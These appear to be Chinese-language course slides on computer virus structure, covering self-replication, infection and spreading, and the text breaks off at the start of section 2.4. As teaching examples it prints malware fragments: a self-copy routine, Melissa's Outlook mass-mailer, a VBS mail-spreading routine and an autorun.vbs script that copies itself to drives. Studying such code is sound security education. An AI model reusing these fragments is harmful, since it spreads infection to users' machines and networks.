病毒立計(jì)算機(jī)病毒第二章35

2計(jì)算機(jī)病毒的構(gòu)造本章開(kāi)始深入講解病毒的機(jī)理構(gòu)造，是重點(diǎn)內(nèi)容主要包括：2．1計(jì)算機(jī)病毒的自我復(fù)制2．2計(jì)算機(jī)病毒的感染機(jī)制2．3計(jì)算機(jī)病毒的傳播機(jī)制2．4計(jì)算機(jī)病毒的偽裝及變種功能2．1計(jì)算機(jī)病毒的自我復(fù)制

自我復(fù)制是計(jì)算機(jī)病毒的最重要特征，要闡述清楚它為什么具有了自我復(fù)制的功能----信息的數(shù)字化和可存儲(chǔ)是基本；不同病毒的自我復(fù)制實(shí)現(xiàn)不同.病毒的自我復(fù)制功能被絕大多數(shù)讀者認(rèn)為是病毒的最奇妙的技術(shù)。其實(shí)，信息的數(shù)字化和機(jī)器的拷貝功能是計(jì)算機(jī)病毒自我復(fù)制技術(shù)的基礎(chǔ)，只不過(guò)復(fù)制不是由計(jì)算機(jī)用戶操作完成，而是病毒本身來(lái)完成，下面將一一介紹。2．1計(jì)算機(jī)病毒的自我復(fù)制2.1.1生物病毒和計(jì)算機(jī)病毒的復(fù)制比較生物病毒的復(fù)制生物病毒是一種生物實(shí)體，它能夠使用細(xì)胞所具有的機(jī)制和物質(zhì)對(duì)自己進(jìn)行再制造，離開(kāi)宿主它不能存在。計(jì)算機(jī)病毒的復(fù)制作為計(jì)算機(jī)病毒一般具有一下兩個(gè)特征：1．該段程序寄生于宿主程序中，宿主程序執(zhí)行時(shí)，該段程序首先被執(zhí)行。即具有寄生性。2．該段程序能夠自我復(fù)制到其他宿主程序中，即具有傳染性。且被感染的程序運(yùn)行時(shí)，病毒程序能夠進(jìn)一步感染其他目標(biāo)程序，從而使病毒得到傳播。能夠進(jìn)行自我復(fù)制計(jì)算機(jī)病毒的執(zhí)行過(guò)程可以這樣描述：AtthebeginningisoneSRP--->/*PhaseI:INFECTIONProcess*/A:.~Searchinagivendirectoryiffile..If(fileisfound)then.If(fingerprintinfile)then.Changetonextentryindirectory.gotoA:.else.CopytheSRPcode:TheinfectedcodeofhostmuststartbytheSearchfunctionandamoveisneededtoavoidtooverwritingcode..Savepreinfectionentryofhost.endif.else.Changedirectory.gotoA:.endif/*Phase2:ACTIONProcess*/.If(trigger)thenACTIONprocess.endif.gotopreinfectionentryinhostprogram--->Now:anewSRP.--->Later...alotofSRP‘s.2.1.2計(jì)算機(jī)病毒自我復(fù)制示例

VC寫(xiě)的病毒自我傳播的示例：voidCMeCopyDlg::OnMeCopy(){//只所以寫(xiě)這類程序希望大家能明白的是病毒怎么感染和自我傳播的,我會(huì)把它的各個(gè)功能寫(xiě)出來(lái)..charsyspath[256]={0},pepath[256]={0};interrsys=::GetWindowsDirectoryA(syspath,255);//獲取系統(tǒng)路徑;interrpe=::GetCurrentDirectory(256,pepath);//獲取當(dāng)前路徑;//---------------這里是沒(méi)有獲取到路徑時(shí)的處理-----------/*...省略....*/charpath[256]={0};//------------------開(kāi)始復(fù)制文件方法1-----------------------charcomm[256]={0};wsprintf(comm,"xcopy/c/r/y%s\\mecopy.exe%s\\system32\\mecopy.exe",pepath,syspath);//這里設(shè)定命令是不管什么只是復(fù)制...$_$...wsprintf(path,"系統(tǒng)路徑:%s\n程序路徑:%s\n拷貝命令:%s"m);MessageBox(path,"GetPath:");//system(comm);//這種復(fù)制是用DOS復(fù)制的,回有個(gè)DOS閃爍一下!回被發(fā)現(xiàn)哦...//另外一種復(fù)制方法:charpath1[256]={0};charpath2[256]={0};wsprintf(path2,"%s\\system32\\mecopy.exe",syspath);wsprintf(path1,"%s\\mecopy.exe",pepath);intcpyerr=CopyFile(path1,path2,1);if(cpyerr==0){MessageBox("CopyFileError!!");}}2.1.2計(jì)算機(jī)病毒自我復(fù)制示Melissa病毒的自我復(fù)制部分的代碼片段如下：IfUngaDasOutlook=“Outlook”ThenDasMapiName.Logon“profile”,”password” Fory=1ToDasMapiName.AddressLists.Count SetAddyBook=DasMapiName.AddressLists(y) x=1 SetBreakUmOffASlice=UngaDasOutlook.CreateItem(0) Foroo=1ToAddyBook.AddressEntries.Count Peep=AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.AddPeep x=x+1 Ifx>50Thenoo=AddyBook.AddressEntries.Count Nextoo BreakUmOffASlice.Subject=“ImportrantMessageFrom”&Application.UserName BreakUmOffASlice.Body=“Hereisthatdocumentyouaskedfor...don’tshowanyoneelse;-)” BreakUmOffASlice.Attachments.AddActiveDocument.FullName BreakUmOffASlice.Send Peep=“” NextyDasMapiName.LogoffEndIf2.1.3病毒自我復(fù)制的結(jié)構(gòu)和模型

Cohen在1984年為計(jì)算機(jī)病毒提出了一個(gè)形式化的數(shù)學(xué)模型，這個(gè)模型使用圖靈機(jī)。實(shí)際上Cohen的計(jì)算機(jī)病毒的形式化數(shù)學(xué)模型與Neumann的自我復(fù)制細(xì)胞自動(dòng)機(jī)是十分像似的。從Neumann的角度，我們可以說(shuō)計(jì)算機(jī)病毒就是一個(gè)可以自我復(fù)制的細(xì)胞自動(dòng)機(jī)。病毒的自我復(fù)制結(jié)構(gòu)程下面的金字塔型結(jié)構(gòu)：2.1.3病毒自我復(fù)制的結(jié)構(gòu)和模型圖2.1病毒自我復(fù)制功能的金字塔型結(jié)構(gòu)2.1.4基于自我復(fù)制功能的檢測(cè)

病毒的自我復(fù)制的結(jié)構(gòu)和描述有些類似于句子的生成，這是病毒的最根本的一個(gè)特征，即使其他的特征不明顯，依據(jù)自我復(fù)制的特征就可以判別是否為病毒，因此本節(jié)介紹自我復(fù)制在病毒檢測(cè)中方法和依據(jù)，詳細(xì)而系統(tǒng)的病毒檢測(cè)將在防治篇中介紹。病毒自我復(fù)制功能的檢測(cè)類似文本的自動(dòng)生成理論。前面對(duì)自我復(fù)制功能的描述就是一個(gè)有窮自動(dòng)機(jī)的形式。2.1.4基于自我復(fù)制功能的檢測(cè)在自我復(fù)制功能的檢測(cè)過(guò)程中，所有的系統(tǒng)調(diào)用都被監(jiān)視器截獲，然后被發(fā)往復(fù)制檢測(cè)模塊，在這里包含了一整套不同的檢測(cè)和過(guò)濾機(jī)制。圖4.3.一場(chǎng)動(dòng)作的檢測(cè)算法2.2計(jì)算機(jī)病毒的感染機(jī)制

2.2.1計(jì)算機(jī)病毒感染機(jī)制的概述2.2.2計(jì)算機(jī)病毒的目的及實(shí)現(xiàn)2.2.3計(jì)算機(jī)病毒的傳染方式2.2.4一個(gè)典型病毒的源碼(感染部分)剖析2.2.5總結(jié)2.2.1計(jì)算機(jī)病毒感染機(jī)制的概述

大多數(shù)的病毒都會(huì)用如下的一段偽代碼來(lái)檢查某目標(biāo)是否已被感染（復(fù)合的感染是相當(dāng)明顯的）。BEGINIF(infectable_object_found)AND(object_not_already_infected)THEN(infect_object)END下一步就是將病毒代碼安裝到可被感染的目標(biāo)中，這可能需要一步或更多的操作來(lái)實(shí)現(xiàn)，其數(shù)目取決于病毒的類型。病毒代碼安裝的方式有：在引導(dǎo)區(qū)中寫(xiě)入一段新代碼。將該代碼附加于某個(gè)程序文件。將宏代碼附加于.doc文檔。將代碼附加于標(biāo)準(zhǔn)系統(tǒng)程序，截?cái)嗑W(wǎng)絡(luò)服務(wù)以便將與受感染文件相連的鏈接發(fā)送到被俘獲的email地址中去。2.2.2計(jì)算機(jī)病毒的目的及實(shí)現(xiàn)

那么病毒在什么情況下被首次執(zhí)行呢?①染有引導(dǎo)型病毒的磁盤在啟動(dòng)計(jì)算機(jī)時(shí)(無(wú)論該磁盤是否是真正的DOS引導(dǎo)盤，是否真正將計(jì)算機(jī)啟動(dòng)成功)，病毒被執(zhí)行。②文件型病毒在執(zhí)行染毒EXE和COM文件時(shí)被執(zhí)行。③初始化批處理啟動(dòng)病毒。④混合型病毒在以上幾種情況下都被執(zhí)行。2.2.3計(jì)算機(jī)病毒的傳染方式

引導(dǎo)型感染：引導(dǎo)型病毒的代表有：Brain病毒，Stoned病毒等。寄生感染：病毒將其代碼放入宿主程序中，或者在頭部或者在尾部亦或者在中部。滋生感染：滋生感染式病毒又名伴侶病毒。破壞性感染：1990年9月產(chǎn)于原西德的Numberone病毒，1991年12月產(chǎn)于加拿大的small38病毒就屬于此類?；旌细腥荆杭雀腥疚募指腥局饕龑?dǎo)扇區(qū)或Boot扇區(qū)的混合感染病毒。交叉感染：2.2.4一個(gè)典型感染剖析

“求職信”病毒是最早出現(xiàn)于2001年年底，相繼出現(xiàn)了多個(gè)變種，專門攻擊微軟公司Outlook及OutlookExpress的弱點(diǎn)。由于此病毒多以求職為郵件內(nèi)容，所以很容易迷惑用戶，用戶只要打開(kāi)(甚至是預(yù)覽)帶有這種病毒的電子郵件，就能夠?qū)е虏《镜陌l(fā)作。當(dāng)病毒駐留系統(tǒng)后可能會(huì)強(qiáng)行關(guān)閉用戶正在進(jìn)行的正常操作，甚至?xí)h除硬盤上的14種文檔?！扒舐毿拧辈《境绦蚓哂须p程序結(jié)構(gòu)，分為蠕蟲(chóng)部分(網(wǎng)絡(luò)傳播)和病毒部分(感染文件，破壞文件)。2.2.4一個(gè)典型感染剖析

當(dāng)“求職信”病毒被激活后(用戶打開(kāi)或預(yù)覽了帶病毒的郵件)，將按下列步驟對(duì)系統(tǒng)進(jìn)行破壞。1.安裝木馬2.修改注冊(cè)表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceWink***=wink***.exe3.中止反病毒程序ACKWIN32,ALERTSVC,AMON,ANTIVIR,……,NOD32,Norton,……等51個(gè)程序4.繁殖病毒將自身復(fù)制到本地硬盤、網(wǎng)絡(luò)映射盤和局域網(wǎng)的共享硬盤上，復(fù)制的文件都具有雙重?cái)U(kuò)展名，一般如下：第一個(gè)后綴為：BAK、BAT、C、CPP、DOC、EXE、HTM、HTML、MP3、MP8、MPEG、MPQ、5.傳播經(jīng)搜索到的郵件地址發(fā)送帶病毒的電子郵件，發(fā)送的帶毒附件的文件名格式和復(fù)制的文件名格式是一樣的。6.修改可執(zhí)行文件2.2.5總結(jié)隨著互聯(lián)網(wǎng)的日益發(fā)展，計(jì)算機(jī)病毒的危害越來(lái)越大，計(jì)算機(jī)病毒的感染方式也愈來(lái)愈多。但病毒的最根本還是自我復(fù)制。在整個(gè)生命期中還采用了隱藏、加密、觸發(fā)條件的手法，等等。本人對(duì)計(jì)算機(jī)病毒感染機(jī)制進(jìn)行了敘述，但不盡詳略。隨著計(jì)算機(jī)病毒的防治愈加重要，對(duì)計(jì)算機(jī)病毒感染機(jī)制的研究也將更深入和廣泛。2.3計(jì)算機(jī)病毒的傳播機(jī)制

2.3.1計(jì)算機(jī)病毒的傳播方式2.3.2計(jì)算機(jī)病毒傳播原理2.3.3典型網(wǎng)絡(luò)病毒傳播源碼分析2.3.4通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播的原理2.3.1計(jì)算機(jī)病毒的傳播方式

通過(guò)網(wǎng)絡(luò)傳播1通過(guò)網(wǎng)絡(luò)的瀏覽和下載傳播2通過(guò)電子郵件等傳播3通過(guò)即時(shí)通訊軟件傳播4通過(guò)局域網(wǎng)傳播5通過(guò)網(wǎng)頁(yè)或軟件等的漏洞進(jìn)行傳播通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播其它傳播方式2.3各種傳播途徑比例2.3.2計(jì)算機(jī)病毒傳播原理1蠕蟲(chóng)的目標(biāo)定位①收集電子郵件地址②進(jìn)行網(wǎng)絡(luò)共享枚舉攻擊。③網(wǎng)絡(luò)掃描和目標(biāo)指紋攻擊。網(wǎng)絡(luò)蠕蟲(chóng)能夠掃描遠(yuǎn)程系統(tǒng)，他們使用預(yù)定義的網(wǎng)絡(luò)地址類（指IP地址類）表產(chǎn)生隨機(jī)的IP地址；隨機(jī)掃描：蠕蟲(chóng)W32/Slammer。Slammer攻擊UDP的1434（SQLserver）端口，它不檢測(cè)IP地址是否有效。2.3.2計(jì)算機(jī)病毒傳播原理

2感染傳播①攻擊安裝了后門的系統(tǒng)。有些蠕蟲(chóng)使用使用其它蠕蟲(chóng)留下的后門接口進(jìn)行傳播，如W32/Borm，它感染安裝了BackOrifice的系統(tǒng)。具體攻擊過(guò)程如下：Ⅰ)隨機(jī)產(chǎn)生一個(gè)IP地址，并用BackOrifice的BO_PING參查看是否安裝有后門；Ⅱ)Borm向服務(wù)器發(fā)送一個(gè)BO_HTTP_ENABLE命令，指示BackOrifice在系統(tǒng)上使用TCP協(xié)議的12345端口建立HTTP代理服務(wù)。Ⅲ)蠕蟲(chóng)連接服務(wù)器，用MIME編碼上傳自己，蠕蟲(chóng)通過(guò)BO_PROCESS_SPAWN命令在服務(wù)器上運(yùn)行剛剛上傳的可執(zhí)行程序，進(jìn)行新的傳播。2.3.3典型網(wǎng)絡(luò)病毒傳播源碼分析

1蠕蟲(chóng)病毒W(wǎng)orm.Japanize的傳播實(shí)例2.3.3典型網(wǎng)絡(luò)病毒傳播源碼分析2vbs腳本病毒通過(guò)網(wǎng)絡(luò)傳播的幾種方式及代碼分析FunctionmailBroadcast()SetmapiObj=outlookApp.GetNameSpace("MAPI")//獲取MAPI的名字空間……ForEachaddrInaddrList//獲取每個(gè)地址表的Email記錄數(shù)ForaddrEntIndex=1ToaddrEntCount//遍歷地址表的Email地址Setitem=outlookApp.CreateItem(0)//獲取一個(gè)郵件對(duì)象實(shí)例SetaddrEnt=addr.AddressEntries(addrEntIndex)//獲取具體Email地址item.To=addrEnt.Address//填入收信人地址…..SetattachMents=item.Attachments//定義郵件附件attachMents.AddfileSysObj.GetSpecialFolder(0)&"\test.jpg.vbs"item.DeleteAfterSubmit=True//信件提交后自動(dòng)刪除Ifitem.To<>""Thenitem.Send//發(fā)送郵件shellObj.regwrite"HKCU\software\Mailtest\mailed","1"http://病毒標(biāo)記，以免重復(fù)感染2.3.4通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播的原理

1主動(dòng)傳播病毒從帶毒載體進(jìn)入內(nèi)存，一般是利用操作系統(tǒng)的加載機(jī)制或引導(dǎo)機(jī)制。病毒從內(nèi)存侵入無(wú)毒介質(zhì)，則利用操作系統(tǒng)的讀寫(xiě)磁盤中斷向量入口地址或修改加載機(jī)制(例如INT13H或INT21H)，使該中斷向量指向病毒程序感染模塊。內(nèi)存中的病毒時(shí)刻監(jiān)視著操作系統(tǒng)的每一個(gè)操作，這樣，一旦系統(tǒng)執(zhí)行磁盤讀寫(xiě)操作或系統(tǒng)功能調(diào)用,病毒感染模塊就會(huì)被激活,感染模塊在判斷感染條件滿足的條件下,把病毒自身感染給被讀寫(xiě)的磁盤或被加載的程序，病毒被按照病毒的磁盤儲(chǔ)存結(jié)構(gòu)存放在磁盤上，然后再轉(zhuǎn)移到原中斷服務(wù)程序執(zhí)行原有的操作。大部分此類的Windows病毒要正確運(yùn)行，則必須調(diào)用API或系統(tǒng)服務(wù)。此類計(jì)算機(jī)病毒感染的一般過(guò)程有：①當(dāng)宿主程序運(yùn)行時(shí)，截取控制權(quán)；②尋找感染的突破口；③將病毒代碼故人宿主程序。Autorun主動(dòng)傳播事例autorun.vbs：onerrorresumenextSetWshShell=CreateObject("WScript.Shell")if1=0thenelseFori=1to1setOf=CreateObject("Scripting.FileSystemObject")setdir=Of.GetSpecialFolder(1)Setdc=Of.DrivesifWScript.ScriptFullName=dir&"\autorun.vbs"thenisdir=trueelsea=WshShell.Run("autorun.batOpen",0,False)isdir=falseendifForEachdIndcIfd.DriveType=2Ord.DriveType=3or(d.DriveType=1andd<>"A:"andd<>"B:")Thena=WshShell.Run("autorun.bat-"&d,0,True)ifisdirthenOf.CopyFiledir&"\autorun.bat",d&"\",TrueOf.CopyFiledir&"\sxs.exe",d&"\",TrueOf.CopyFiledir&"\autorun.inf",d&"\",TrueOf.CopyFiledir&"\autorun.reg",d&"\",TrueOf.CopyFiledir&"\autorun.vbs",d&"\",TrueelseOf.CopyFile"autorun.bat",d&"\",TrueAutorun傳播事例Of.CopyFile"sxs.exe",d&"\",TrueOf.CopyFile"autorun.inf",d&"\",TrueOf.CopyFile"autorun.reg",d&"\",TrueOf.CopyFile"autorun.vbs",d&"\",Trueendifa=WshShell.Run("autorun.bat+"&d,0,True)EndIfnextifisdirthenwscript.sleep60000i=0elsea=WshShell.Run("autorun.bat-"&dir,0,True)Of.CopyFile"autorun.bat",dir&"\",TrueOf.CopyFile"sxs.exe",dir&"\",TrueOf.CopyFile"autorun.inf",dir&"\",TrueOf.CopyFile"autorun.reg",dir&"\",TrueOf.CopyFile"autorun.vbs",dir&"\",Truea=WshShell.Run("autorun.bat+"&dir,0,True)EndifnextEndif2.3.4通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播的原理2被動(dòng)傳播用戶在進(jìn)行拷貝磁盤或文件時(shí),把一個(gè)病毒由一個(gè)載體復(fù)制到另外一個(gè)載體上。或者執(zhí)行一個(gè)染毒的程序時(shí)，導(dǎo)致病毒運(yùn)行而感染。有時(shí)病毒會(huì)使用一種巧妙的方式誘騙用戶執(zhí)行病毒，病毒把U盤下所有文件夾隱藏，并把自己復(fù)制成與原文件夾名稱相同的具有文件夾圖標(biāo)的文件，當(dāng)你點(diǎn)擊時(shí)病毒會(huì)執(zhí)行自身并且打開(kāi)隱藏的該名稱的文件夾。2.3.5總結(jié)

病毒的傳播方式是多種多樣的，同一種病毒可能有多種傳播方式。病毒的傳播技術(shù)是隨著計(jì)算機(jī)技術(shù)的發(fā)展而發(fā)展。在本節(jié)中，簡(jiǎn)單地討論了計(jì)算機(jī)病毒利用網(wǎng)絡(luò)及移動(dòng)存儲(chǔ)介質(zhì)的傳播原理，著重分析了網(wǎng)絡(luò)環(huán)境下的病毒傳播，列出了常用的傳播技術(shù)。2.4病毒的偽裝及變種機(jī)制2.4.1